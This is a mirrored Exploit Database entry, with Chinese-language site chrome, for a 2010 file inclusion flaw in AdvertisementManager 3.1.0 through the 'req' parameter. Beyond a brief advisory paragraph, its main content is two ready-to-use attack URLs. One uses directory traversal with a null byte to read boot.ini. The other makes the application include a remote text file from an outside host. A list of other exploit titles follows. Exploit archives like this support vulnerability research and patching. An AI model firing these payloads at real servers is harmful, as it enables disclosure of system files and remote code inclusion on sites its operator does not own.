AdvertisementManager 3.1 – ‘req’ Local/Remote File Inclusion

Exploit Database
9 阅读

作者： indoushka

日期： 2010-01-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/34849/

source: https://www.securityfocus.com/bid/44165/info

AdvertisementManager is prone to local and remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow a remote attacker to obtain sensitive information or compromise the application and the underlying computer; other attacks are also possible.

AdvertisementManager 3.1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=../../../../../../../../boot.ini%00

http://www.example.com/Advertisement/cgi/index.php?usr=indoushka&passw=indoushka&savelogin=on&admin=Enter&req=http://www.example.com/c.txt?

last Exploits
AdvertisementManager 3.1 – ‘req’ Local/Remote File Inclusion的更多信息

Textpattern CMS 4.6.2 – ‘body’ Persistent Cross-Site Scripting：
osDate 2.1.9 – Remote File Inclusion：
Interscan Web Security 5.0 – Persistent Cross-Site Scripting：
Jedox 2022.4.2 – Remote Code Execution via Directory Traversal：
Online Traffic Offense Management System 1.0 – Multiple RCE (Unauthenticated)：
Joomla! Component Alameda 1.0 – SQL Injection：
Uiga Fan Club – ‘index.php’ SQL Injection：
Genexis Platinum-4410 – ‘SSID’ Persistent XSS：